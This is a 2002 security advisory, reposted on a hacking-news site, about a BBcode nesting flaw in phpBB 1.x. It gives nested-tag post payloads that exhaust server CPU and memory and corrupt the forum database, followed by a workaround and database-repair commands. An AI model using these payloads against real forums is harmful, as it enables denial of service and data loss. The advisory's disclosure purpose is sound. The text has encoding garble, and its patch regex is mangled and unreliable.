Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » WSS-Advisories-02003) PHPBB BBcode Process Vulnerability

WSS-Advisories-02003) PHPBB BBcode Process Vulnerability

by Nikola Strahija on April 5th, 2002 WSS has found a vulnerability in PHPBB when PHPBB process BBcode,which could enbale one user D.O.S system and destroy PHPBB databases.


Affected Versions
--------------------

phpBB Group phpBB 1.4.4
phpBB Group phpBB 1.4.2
phpBB Group phpBB 1.4.1
phpBB Group phpBB 1.4.0
phpBB Group phpBB 1.2.1
phpBB Group phpBB 1.2.0
phpBB Group phpBB 1.0.0
----------------------------

NOT TEST:
phpBB Group phpBB 2.x


Description:
------------

phpbb support nesting BBcode [code][/code],[quote][/quote],[list][/list].
Unfortunately,there is a mistake when process BBcode in functions.php .


Exploit:
----------

.Łş
submit the following poster:

[code]

[code]

In fact, the following data have saved to database after BBcode process.

[1code]

[/code1][1code]

[/code1][1code]

[/code1][1code]

[/code1][1code]

[/code1][1code]

[/code1][1code]

[/code1]

.Łş
submit the following poster:
[code]''*800[/code]

see system
whitecell$ top
PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND
8643 nobody 13 0 212M 81M 13604 D 8.0 65.7 0:07 httpd

phpbb error message:
Could not enter post text!

but in fact ,Two data have alreay saved to databases.Now, the database
is uncompleted.If you brower the forum to see which you post,phpbb could
report message:"Could not connect to the forums database."

.Łş
submit 49 bytes data:

[code][code][code][/code][/code][/code]

type top to see cpu:
PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND
25741 nobody 14 0 11828 9996 416 R 99.9 7.8 2:38 httpd

Experiment environmentŁşlinux 2.4.10 Apache/1.3.23 PHP 4.1.2


Vendor
--------

http://www.phpbb.com


Workaround:
-----------

1:disale BBcode until Vendor fixed.
2:modify functions.php bbencode_code()

function bbencode_code($message, $is_html_disabled)
{
$message = preg_replace("/[code](.*?)[/code]/si", "Code:

1
", $message);
return $message;

} // bbencode_code()

REPAIR DATABASE:
if url is http://host/forums/viewtopic.php?topic=1162&forum=1&0
you can use the following command to repair it :
whitecell$ mysql -uuser -ppasswd
mysql> use databasename;
mysql> select * from topics where topic_id = 1162; //GET post_id
mysql> delete from posts where post_id = 6280;
mysql> delete from posts_text where post_id = 6280;
mysql> delete from topics where topic_id = 1162;


ABOUT WSSŁş
------------

WSS is a non-profit and free technology organization . We are devoting to
research and demonstration of weaknesses related to network services ,
communication security and system security.



Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »